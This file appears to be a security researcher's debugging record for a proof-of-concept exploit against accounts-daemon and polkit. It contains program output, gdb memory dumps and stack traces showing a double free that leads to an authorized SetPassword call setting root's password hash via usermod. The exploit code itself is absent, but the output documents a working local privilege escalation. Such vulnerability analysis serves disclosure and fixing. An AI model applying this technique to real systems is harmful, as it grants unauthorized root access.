info.txt
Output from poc2:
uid: 1001
pid: 1382019
home dir: /home/kev
Unique bus name (polkit): :1.40039
Received a signal in PolkitHandler.
Unique bus name (accounts): :1.40040
Received a signal in AccountsHandler.
Successfully registered with polkit
FindUserById: /org/freedesktop/Accounts/User1001
batch sizes: 3 2
accounts-daemon PID: 1506283
accounts-daemon is not running
FindUserById: /org/freedesktop/Accounts/User0
Starting exploit. PID: 1506348
trigger_bug: isError = 0
trigger_bug: isError = 1
from journalctl:
Nov 23 11:56:37 Speedy accounts-daemon[1506348]: fallback_value (FormatsLocale): 0x564cfbc8e4c0
Nov 23 11:56:37 Speedy accounts-daemon[1506348]: fallback_value (Language): 0x564cfbc89ea0
accounts-daemon logging:
(gdb) p logentry_pos
$2 = 159
(gdb) x /172wx logentries
0x564cfbb00220 <logentries>: 0x00000000 0x00000000 0x00000003 0x00000004
0x564cfbb00230 <logentries+16>: 0x00000001 0x00000002 0x00000005 0x00000001
0x564cfbb00240 <logentries+32>: 0x00000002 0x00000005 0x00000001 0x00000002
0x564cfbb00250 <logentries+48>: 0x00000005 0x00000003 0x00000004 0x00000001
0x564cfbb00260 <logentries+64>: 0x00000002 0x00000005 0x00000001 0x00000002
0x564cfbb00270 <logentries+80>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00280 <logentries+96>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00290 <logentries+112>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb002a0 <logentries+128>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb002b0 <logentries+144>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb002c0 <logentries+160>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb002d0 <logentries+176>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb002e0 <logentries+192>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb002f0 <logentries+208>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00300 <logentries+224>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00310 <logentries+240>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00320 <logentries+256>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00330 <logentries+272>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00340 <logentries+288>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00350 <logentries+304>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00360 <logentries+320>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00370 <logentries+336>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00380 <logentries+352>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00390 <logentries+368>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb003a0 <logentries+384>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb003b0 <logentries+400>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb003c0 <logentries+416>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb003d0 <logentries+432>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb003e0 <logentries+448>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb003f0 <logentries+464>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00400 <logentries+480>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00410 <logentries+496>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00420 <logentries+512>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00430 <logentries+528>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00440 <logentries+544>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00450 <logentries+560>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00460 <logentries+576>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00470 <logentries+592>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00480 <logentries+608>: 0x00000005 0x00000001 0x00000002 0x00000002
0x564cfbb00490 <logentries+624>: 0x00000002 0x00000002 0x00000006 0x00000000
0x564cfbb004a0 <logentries+640>: 0x00000000 0x00000000 0x00000000 0x00000000
0x564cfbb004b0 <logentries+656>: 0x00000000 0x00000000 0x00000000 0x00000000
0x564cfbb004c0 <logentries+672>: 0x00000000 0x00000000 0x00000000 0x00000000
polkit logging:
(gdb) p checkauthdata_pos
$3 = 161
(gdb) x /164gx checkauthdata_table
0x7f2620ca2620 <checkauthdata_table>: 0x0000564cfbd1f970 0x0000564cfbd1f970
0x7f2620ca2630 <checkauthdata_table+16>: 0x0000564cfbd0efd0 0x0000564cfbd0efd0
0x7f2620ca2640 <checkauthdata_table+32>: 0x0000564cfbc8e4c0 0x0000564cfbd1f930
0x7f2620ca2650 <checkauthdata_table+48>: 0x0000564cfbd1f930 0x0000564cfbd1e390
0x7f2620ca2660 <checkauthdata_table+64>: 0x0000564cfbd1cc80 0x0000564cfbd1cc80
0x7f2620ca2670 <checkauthdata_table+80>: 0x0000564cfbc81670 0x0000564cfbd20800
0x7f2620ca2680 <checkauthdata_table+96>: 0x0000564cfbd20800 0x0000564cfbc81c10
0x7f2620ca2690 <checkauthdata_table+112>: 0x0000564cfbc81c10 0x0000564cfbc903e0
0x7f2620ca26a0 <checkauthdata_table+128>: 0x0000564cfbc81e00 0x0000564cfbc81e00
0x7f2620ca26b0 <checkauthdata_table+144>: 0x0000564cfbd1cfe0 0x0000564cfbc927e0
0x7f2620ca26c0 <checkauthdata_table+160>: 0x0000564cfbd102d0 0x0000564cfbc7a600
0x7f2620ca26d0 <checkauthdata_table+176>: 0x0000564cfbd11a40 0x0000564cfbd1e740
0x7f2620ca26e0 <checkauthdata_table+192>: 0x0000564cfbc7fc20 0x0000564cfbd23e80
0x7f2620ca26f0 <checkauthdata_table+208>: 0x0000564cfbcd6bd0 0x0000564cfbc8e4c0
0x7f2620ca2700 <checkauthdata_table+224>: 0x0000564cfbd23f00 0x0000564cfbd21cb0
0x7f2620ca2710 <checkauthdata_table+240>: 0x0000564cfbc83800 0x0000564cfbd15f10
0x7f2620ca2720 <checkauthdata_table+256>: 0x0000564cfbd1f2e0 0x0000564cfbd16ac0
0x7f2620ca2730 <checkauthdata_table+272>: 0x0000564cfbc85ce0 0x0000564cfbd0f6a0
0x7f2620ca2740 <checkauthdata_table+288>: 0x0000564cfbc7e590 0x0000564cfbd1d350
0x7f2620ca2750 <checkauthdata_table+304>: 0x0000564cfbd18020 0x0000564cfbd17e30
0x7f2620ca2760 <checkauthdata_table+320>: 0x0000564cfbd13030 0x0000564cfbd23ea0
0x7f2620ca2770 <checkauthdata_table+336>: 0x0000564cfbd17ef0 0x0000564cfbd19310
0x7f2620ca2780 <checkauthdata_table+352>: 0x0000564cfbc81e00 0x0000564cfbd26320
0x7f2620ca2790 <checkauthdata_table+368>: 0x0000564cfbd18100 0x0000564cfbd17b60
0x7f2620ca27a0 <checkauthdata_table+384>: 0x0000564cfbd28460 0x0000564cfbc8e4c0
0x7f2620ca27b0 <checkauthdata_table+400>: 0x0000564cfbd194a0 0x0000564cfbd284e0
0x7f2620ca27c0 <checkauthdata_table+416>: 0x0000564cfbd275d0 0x0000564cfbd29380
0x7f2620ca27d0 <checkauthdata_table+432>: 0x0000564cfbd21c40 0x0000564cfbd19630
0x7f2620ca27e0 <checkauthdata_table+448>: 0x0000564cfbd17d20 0x0000564cfbd1c3e0
0x7f2620ca27f0 <checkauthdata_table+464>: 0x0000564cfbd293a0 0x0000564cfbc8e4c0
0x7f2620ca2800 <checkauthdata_table+480>: 0x0000564cfbd1e790 0x0000564cfbd2aec0
0x7f2620ca2810 <checkauthdata_table+496>: 0x0000564cfbd2af70 0x0000564cfbd2d8f0
0x7f2620ca2820 <checkauthdata_table+512>: 0x0000564cfbd2d9e0 0x0000564cfbd2da70
0x7f2620ca2830 <checkauthdata_table+528>: 0x0000564cfbd262a0 0x0000564cfbd2dd50
0x7f2620ca2840 <checkauthdata_table+544>: 0x0000564cfbd2abd0 0x0000564cfbd2bc90
0x7f2620ca2850 <checkauthdata_table+560>: 0x0000564cfbd2cbe0 0x0000564cfbd2e2d0
0x7f2620ca2860 <checkauthdata_table+576>: 0x0000564cfbd2ae40 0x0000564cfbd2d800
0x7f2620ca2870 <checkauthdata_table+592>: 0x0000564cfbd2e270 0x0000564cfbd30430
0x7f2620ca2880 <checkauthdata_table+608>: 0x0000564cfbd31210 0x0000564cfbd32820
0x7f2620ca2890 <checkauthdata_table+624>: 0x0000564cfbd310a0 0x0000564cfbd2cad0
0x7f2620ca28a0 <checkauthdata_table+640>: 0x0000564cfbd1e390 0x0000564cfbd1e390
0x7f2620ca28b0 <checkauthdata_table+656>: 0x0000564cfbd262c0 0x0000564cfbd2c820
0x7f2620ca28c0 <checkauthdata_table+672>: 0x0000564cfbd31280 0x0000564cfbd32d50
0x7f2620ca28d0 <checkauthdata_table+688>: 0x0000564cfbc829a0 0x0000564cfbd1ccd0
0x7f2620ca28e0 <checkauthdata_table+704>: 0x0000564cfbd2e040 0x0000564cfbd13050
0x7f2620ca28f0 <checkauthdata_table+720>: 0x0000564cfbd352f0 0x0000564cfbd35780
0x7f2620ca2900 <checkauthdata_table+736>: 0x0000564cfbd32c80 0x0000564cfbd364d0
0x7f2620ca2910 <checkauthdata_table+752>: 0x0000564cfbd28480 0x0000564cfbd364f0
0x7f2620ca2920 <checkauthdata_table+768>: 0x0000564cfbd34270 0x0000564cfbd35520
0x7f2620ca2930 <checkauthdata_table+784>: 0x0000564cfbd32ae0 0x0000564cfbd34080
0x7f2620ca2940 <checkauthdata_table+800>: 0x0000564cfbd34300 0x0000564cfbd37310
0x7f2620ca2950 <checkauthdata_table+816>: 0x0000564cfbd36310 0x0000564cfbd362a0
0x7f2620ca2960 <checkauthdata_table+832>: 0x0000564cfbd37680 0x0000564cfbd35760
0x7f2620ca2970 <checkauthdata_table+848>: 0x0000564cfbd38300 0x0000564cfbd34650
0x7f2620ca2980 <checkauthdata_table+864>: 0x0000564cfbd3b7e0 0x0000564cfbd3a580
0x7f2620ca2990 <checkauthdata_table+880>: 0x0000564cfbd393a0 0x0000564cfbd35570
0x7f2620ca29a0 <checkauthdata_table+896>: 0x0000564cfbd3c410 0x0000564cfbd3c430
0x7f2620ca29b0 <checkauthdata_table+912>: 0x0000564cfbc81670 0x0000564cfbd3c5a0
0x7f2620ca29c0 <checkauthdata_table+928>: 0x0000564cfbd3b450 0x0000564cfbd38470
0x7f2620ca29d0 <checkauthdata_table+944>: 0x0000564cfbd3ed50 0x0000564cfbd0f440
0x7f2620ca29e0 <checkauthdata_table+960>: 0x0000564cfbc847c0 0x0000564cfbd3eff0
0x7f2620ca29f0 <checkauthdata_table+976>: 0x0000564cfbd39b30 0x0000564cfbd39330
0x7f2620ca2a00 <checkauthdata_table+992>: 0x0000564cfbd327c0 0x0000564cfbd402c0
0x7f2620ca2a10 <checkauthdata_table+1008>: 0x0000564cfbd40430 0x0000564cfbd40240
0x7f2620ca2a20 <checkauthdata_table+1024>: 0x0000564cfbd41300 0x0000564cfbd3ee60
0x7f2620ca2a30 <checkauthdata_table+1040>: 0x0000564cfbd414a0 0x0000564cfbd41400
0x7f2620ca2a40 <checkauthdata_table+1056>: 0x0000564cfbd43ad0 0x0000564cfbd43300
0x7f2620ca2a50 <checkauthdata_table+1072>: 0x0000564cfbd41080 0x0000564cfbd3edc0
0x7f2620ca2a60 <checkauthdata_table+1088>: 0x0000564cfbd44740 0x0000564cfbd44320
0x7f2620ca2a70 <checkauthdata_table+1104>: 0x0000564cfbd43370 0x0000564cfbd41030
0x7f2620ca2a80 <checkauthdata_table+1120>: 0x0000564cfbd323f0 0x0000564cfbd41620
0x7f2620ca2a90 <checkauthdata_table+1136>: 0x0000564cfbd446e0 0x0000564cfbd3ef30
0x7f2620ca2aa0 <checkauthdata_table+1152>: 0x0000564cfbd47450 0x0000564cfbd474d0
0x7f2620ca2ab0 <checkauthdata_table+1168>: 0x0000564cfbd44610 0x0000564cfbd47470
0x7f2620ca2ac0 <checkauthdata_table+1184>: 0x0000564cfbc903e0 0x0000564cfbd476a0
0x7f2620ca2ad0 <checkauthdata_table+1200>: 0x0000564cfbd493e0 0x0000564cfbd49590
0x7f2620ca2ae0 <checkauthdata_table+1216>: 0x0000564cfbd47410 0x0000564cfbd498b0
0x7f2620ca2af0 <checkauthdata_table+1232>: 0x0000564cfbd323d0 0x0000564cfbd47110
0x7f2620ca2b00 <checkauthdata_table+1248>: 0x0000564cfbc927e0 0x0000564cfbc7a600
0x7f2620ca2b10 <checkauthdata_table+1264>: 0x0000564cfbd1e740 0x0000564cfbd23e80
0x7f2620ca2b20 <checkauthdata_table+1280>: 0x0000564cfbc8e4c0 0x0000000000000000
0x7f2620ca2b30 <checkauthdata_table+1296>: 0x0000000000000000 0x0000000000000000
stack trace:
(gdb) where
#0 0x00007f2620b40a48 in __GI___clock_nanosleep (clock_id=clock_id@entry=0, flags=flags@entry=0, req=req@entry=0x7ffd9208fc30, rem=rem@entry=0x7ffd9208fc30) at ../sysdeps/unix/sysv/linux/clock_nanosleep.c:78
#1 0x00007f2620b45957 in __GI___nanosleep (req=req@entry=0x7ffd9208fc30, rem=rem@entry=0x7ffd9208fc30) at ../sysdeps/unix/sysv/linux/nanosleep.c:25
#2 0x00007f2620b4588e in __sleep (seconds=0) at ../sysdeps/posix/sleep.c:55
#3 0x0000564cfbadff72 in user_change_password_authorized_cb (daemon=0x564cfbc660f0, user=0x564cfbc8f2f0, context=0x7f26140196a0, data=0x564cfbd17a00) at ../src/user.c:2813
#4 0x0000564cfbad5f75 in check_auth_cb (authority=0x564cfbd0b440, res=0x564cfbd29a00, data=0x564cfbd1a350) at ../src/daemon.c:1428
#5 0x00007f2620ed2fe2 in g_simple_async_result_complete (simple=0x564cfbd29a00) at ../../../gio/gsimpleasyncresult.c:802
#6 0x00007f2620c8bc8b in check_authorization_cb (proxy=0x564cfbc8a510, res=0x564cfbd256e0, user_data=0x564cfbc8e4c0) at /home/kev/projects/polkit/policykit-1-0.105/src/polkit/polkitauthority.c:854
#7 0x00007f2620ee9749 in g_task_return_now (task=0x564cfbd256e0) at ../../../gio/gtask.c:1219
#8 0x00007f2620ee994b in g_task_return (type=<optimised out>, task=0x564cfbd256e0) at ../../../gio/gtask.c:1289
#9 g_task_return (task=0x564cfbd256e0, type=<optimised out>) at ../../../gio/gtask.c:1245
#10 0x00007f2620f5204b in reply_cb (connection=<optimised out>, res=<optimised out>, user_data=user_data@entry=0x564cfbd256e0) at ../../../gio/gdbusproxy.c:2557
#11 0x00007f2620ee9749 in g_task_return_now (task=0x564cfbd14480) at ../../../gio/gtask.c:1219
#12 0x00007f2620ee994b in g_task_return (type=<optimised out>, task=0x564cfbd14480) at ../../../gio/gtask.c:1289
#13 g_task_return (task=0x564cfbd14480, type=<optimised out>) at ../../../gio/gtask.c:1245
#14 0x00007f2620f4220f in g_dbus_connection_call_done (source=<optimised out>, result=<optimised out>, user_data=user_data@entry=0x564cfbd14480) at ../../../gio/gdbusconnection.c:5789
#15 0x00007f2620ee9749 in g_task_return_now (task=0x564cfbd14540) at ../../../gio/gtask.c:1219
#16 0x00007f2620ee978d in complete_in_idle_cb (task=0x564cfbd14540) at ../../../gio/gtask.c:1233
#17 0x00007f2620d007c4 in g_main_dispatch (context=0x564cfbc4ffb0) at ../../../glib/gmain.c:3337
#18 g_main_context_dispatch (context=0x564cfbc4ffb0) at ../../../glib/gmain.c:4055
#19 0x00007f2620d53f08 in g_main_context_iterate.constprop.0 (context=0x564cfbc4ffb0, block=block@entry=1, dispatch=dispatch@entry=1, self=<optimised out>) at ../../../glib/gmain.c:4131
#20 0x00007f2620cffe43 in g_main_loop_run (loop=0x564cfbc50d60) at ../../../glib/gmain.c:4329
#21 0x0000564cfbad7ba8 in main (argc=1, argv=0x7ffd920901c8) at ../src/main.c:257
threads:
(gdb) info threads
Id Target Id Frame
* 1 Thread 0x7f2620465dc0 (LWP 1506348) "accounts-daemon" 0x00007f2620b40a48 in __GI___clock_nanosleep (clock_id=clock_id@entry=0, flags=flags@entry=0, req=req@entry=0x7ffd9208fc30, rem=rem@entry=0x7ffd9208fc30) at ../sysdeps/unix/sysv/linux/clock_nanosleep.c:78
2 Thread 0x7f261fef3640 (LWP 1506349) "gmain" 0x00007f2620b73cdf in __GI___poll (fds=0x564cfbc52660, nfds=2, timeout=3998) at ../sysdeps/unix/sysv/linux/poll.c:29
3 Thread 0x7f261eef1640 (LWP 1506351) "gdbus" 0x00007f2620b73cdf in __GI___poll (fds=0x7f2610011000, nfds=2, timeout=-1) at ../sysdeps/unix/sysv/linux/poll.c:29
A more detailed look at some of the stack frames:
(gdb) up 1
#3 0x0000564cfbadff72 in user_change_password_authorized_cb (daemon=0x564cfbc660f0, user=0x564cfbc8f2f0, context=0x7f26140196a0, data=0x564cfbd17a00) at ../src/user.c:2813
2813 sleep(1);
(gdb) info args
daemon = 0x564cfbc660f0
user = 0x564cfbc8f2f0
context = 0x7f26140196a0
data = 0x564cfbd17a00
(gdb) info locals
i = 5190
strings = 0x564cfbd17a00
error = 0x0
argv = {0x564cfbaf277d "/usr/sbin/usermod", 0x564cfbaf2a07 "-p", 0x564cfbd2bc40 "$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB", 0x564cfbaf2318 "--", 0x564cfbd0f5a0 "root", 0x0}
(gdb) p *daemon
Python Exception <class 'TypeError'>: can only concatenate str (not "NoneType") to str
$5 = {parent = {parent_instance = {parent_instance = {g_type_instance = {g_class = }, ref_count = 131, qdata = 0x0}, priv = 0x564cfbc660c0}, priv = 0x564cfbc66090}}
(gdb) p *user
Python Exception <class 'TypeError'>: can only concatenate str (not "NoneType") to str
$6 = {parent = {parent_instance = {parent_instance = {g_type_instance = {g_class = }, ref_count = 69, qdata = 0x564cfbd323a0}, priv = 0x564cfbc8f2c0}, priv = 0x564cfbc8f290}, system_bus_connection = 0x564cfbc60050, object_path = 0x0, daemon = 0x564cfbc660f0, keyfile = 0x564cfbc6fc50, gid = 0, expiration_time = -1, last_change_time = 18954, min_days_between_changes = 0, max_days_between_changes = 99999, days_to_warn = 7, days_after_expiration_until_lock = -1, login_history = 0x0, icon_file = 0x0, default_icon_file = 0x564cfbc84e00 "/root/.face", account_expiration_policy_known = 1, cached = 0, extension_ids = 0x0, n_extension_ids = 0, changed_timeout_id = 0}
(gdb) p *context
$7 = {parent_instance = {g_type_instance = {g_class = 0x564cfbc63070 [g_type: None]}, ref_count = 1, qdata = 0x7f2614020f50}, sender = 0x7f261401eb30 ":1.40040", object_path = 0x7f2614020ef0 "/org/freedesktop/Accounts/User0", interface_name = 0x7f2614020f20 "org.freedesktop.Accounts.User", method_name = 0x7f2614020e10 "SetPassword", method_info = 0x564cfbafe4a0 <_accounts_user_method_info_set_password>, property_info = 0x0, connection = 0x564cfbc60050, message = 0x7f2614013370, parameters = 0x7f261401cd20, user_data = 0x564cfbc8f2f0}
(gdb) p strings
$8 = (gchar **) 0x564cfbd17a00
(gdb) p strings[0]
$9 = (gchar *) 0x564cfbd2bc40 "$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB"
(gdb) p strings[1]
$10 = (gchar *) 0x564cfbd1a490 "GoldenEye"
(gdb) up 1
#4 0x0000564cfbad5f75 in check_auth_cb (authority=0x564cfbd0b440, res=0x564cfbd29a00, data=0x564cfbd1a350) at ../src/daemon.c:1428
warning: Source file is more recent than executable.
1428 (* cad->authorized_cb) (cad->daemon,
(gdb) info args
authority = 0x564cfbd0b440
res = 0x564cfbd29a00
data = 0x564cfbd1a350
(gdb) info locals
cad = 0x564cfbd1a350
result = 0x564cfbd10840
error = 0x0
is_authorized = 1
(gdb) p *authority
$11 = {parent_instance = {g_type_instance = {g_class = 0x564cfbd0af90 [g_type: None]}, ref_count = 261, qdata = 0x0}, name = 0x0, version = 0x0, proxy = 0x564cfbc8a510, cancellation_id_counter = 0, initialized = 1, initialization_error = 0x0}
(gdb) p *res
$12 = <incomplete type>
(gdb) p *cad
$13 = {daemon = 0x564cfbc660f0, user = 0x564cfbc8f2f0, authorized_cb = 0x564cfbadfd3d <user_change_password_authorized_cb>, context = 0x7f26140196a0, data = 0x564cfbd17a00, destroy_notify = 0x564cfbae008d <free_passwords>}
(gdb) p *result
$14 = {parent_instance = {g_type_instance = {g_class = 0x564cfbd1e920 [g_type: None]}, ref_count = 1, qdata = 0x0}, is_authorized = 1, is_challenge = 0, details = 0x564cfbc6c0a0}
(gdb) up 1
#5 0x00007f2620ed2fe2 in g_simple_async_result_complete (simple=0x564cfbd29a00) at ../../../gio/gsimpleasyncresult.c:802
802 simple->callback (simple->source_object,
(gdb) info args
simple = 0x564cfbd29a00
(gdb) info locals
current_source = <optimised out>
current_context = <optimised out>
__func__ = "g_simple_async_result_complete"
(gdb) p *simple
$15 = {parent_instance = {g_type_instance = {g_class = 0x564cfbc62790 [g_type: None]}, ref_count = 1, qdata = 0x0}, source_object = 0x564cfbd0b440, callback = 0x564cfbad5e39 <check_auth_cb>, user_data = 0x564cfbd1a350, context = 0x564cfbc4ffb0, error = 0x0, failed = 0, handle_cancellation = 1, check_cancellable = 0x0, source_tag = 0x7f2620c8bce1 <polkit_authority_check_authorization>, op_res = {v_pointer = 0x564cfbd10840, v_boolean = -70186944, v_ssize = 94888642283584}, destroy_op_res = 0x7f2620e019f0 <g_object_unref>}
(gdb) up 1
#6 0x00007f2620c8bc8b in check_authorization_cb (proxy=0x564cfbc8a510, res=0x564cfbd256e0, user_data=0x564cfbc8e4c0) at /home/kev/projects/polkit/policykit-1-0.105/src/polkit/polkitauthority.c:854
warning: Source file is more recent than executable.
854 g_simple_async_result_complete (data->simple);
(gdb) info args
proxy = 0x564cfbc8a510
res = 0x564cfbd256e0
user_data = 0x564cfbc8e4c0
(gdb) info locals
data = 0x564cfbc8e4c0
value = 0x7f261405c440
error = 0x0
(gdb) p *proxy
$16 = {parent_instance = {g_type_instance = {g_class = 0x564cfbc5a730 [g_type: None]}, ref_count = 131, qdata = 0x564cfbd0ae80}, priv = 0x564cfbc8a4a0}
(gdb) p *res
$17 = <incomplete type>
(gdb) p *data
$18 = {authority = 0x564cfbd0b440, simple = 0x564cfbd29a00, cancellation_id = 0x0}
(gdb) p *value
$19 = {type_info = 0x7f261402fc30, size = 18446744073709551615, contents = {serialised = {bytes = 0x564cfbd49ca0, data = 0x1}, tree = {children = 0x564cfbd49ca0, n_children = 1}}, state = 4, ref_count = 1, depth = 0}
The double free happens at address 0x564cfbc8e4c0. Notice that the CheckAuthData struct has been allocated at that address (see the check_authorization_cb stack frame, where data = 0x564cfbc8e4c0). Notice also that the same address appears multiple times in checkauthdata_table, so it has been reused repeatedly to store a CheckAuthData struct.